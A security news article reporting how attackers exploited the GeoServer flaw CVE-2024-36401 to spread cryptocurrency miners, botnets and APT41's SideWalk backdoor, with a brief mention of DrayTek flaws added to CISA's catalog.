GeoServer Weakness Exploited by Intruders for Distributing Backdoors and Botnet Malware

Sep 06, 2024Ravie LakshmananCryptocurrency / APT Attack

An uncovered security weakness in OSGeo GeoServer GeoTools has been used in various schemes to distribute cryptocurrency miners, botnet malware like Condi and JenX, and a known backdoor name

Sep 06, 2024Ravie LakshmananCryptocurrency / APT Attack

GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware

An uncovered security weakness in OSGeo GeoServer GeoTools has been used in various schemes to distribute cryptocurrency miners, botnet malware like Condi and JenX, and a known backdoor named SideWalk.

The security flaw is a severe remote code execution flaw (CVE-2024-36401, CVSS score: 9.8) that could enable malicious individuals to gain control over vulnerable instances.

During mid-July, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) included it in its Known Exploited Vulnerabilities (KEV) inventory, due to evidence of ongoing exploitation. As per the Shadowserver Foundation, attempts to exploit it were noticed against their honeypot sensors from July 9, 2024.

According to Fortinet FortiGuard Labs, the flaw has been spotted distributing GOREVERSE, a reverse proxy server crafted to initiate a connection with a command-and-control (C2) server for post-exploitation operations.

These attacks are reportedly aimed at IT service providers in India, tech firms in the U.S., governmental bodies in Belgium, and telcos in Thailand and Brazil.

The GeoServer server has also been used as a channel for Condi and a Mirai botnet variant called JenX, along with at least four types of cryptocurrency miners, one of which is fetched from a counterfeit website pretending to be the Institute of Chartered Accountants of India (ICAI).

Arguably the most remarkable of the attack chains using the flaw is the one that spreads an advanced Linux backdoor named SideWalk, which is attributed to a Chinese threat actor known as APT41.

The process commences with a shell script responsible for fetching the ELF binaries for ARM, MIPS, and X86 architectures, which subsequently decrypts the C2 server from an encrypted configuration, establishes a connection to it, and fetches further commands for executing on the compromised device.

This involves executing a legitimate tool named Fast Reverse Proxy (FRP) to avoid detection by establishing an encrypted tunnel from the host to the attacker-managed server, allowing continual remote access, data extraction, and payload deployment.

“The primary targets seem to be spread across three key regions: South America, Europe, and Asia,” noted security researchers Cara Lin and Vincent Li.

“This geographical diversity indicates a sophisticated and widely-reaching attack campaign, possibly exploiting vulnerabilities common to these different markets or aiming at specific industries prevalent in these regions.”

The recent development comes as CISA recently appended two flaws from 2021 in DrayTek VigorConnect (CVE-2021-20123 and CVE-2021-20124, CVSS scores: 7.5) to its KEV catalog that could be leveraged for downloading arbitrary files from the underlying operating system with root privileges.

Enjoyed this article? Follow us on Twitter and LinkedIn to explore more exclusive content we share.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts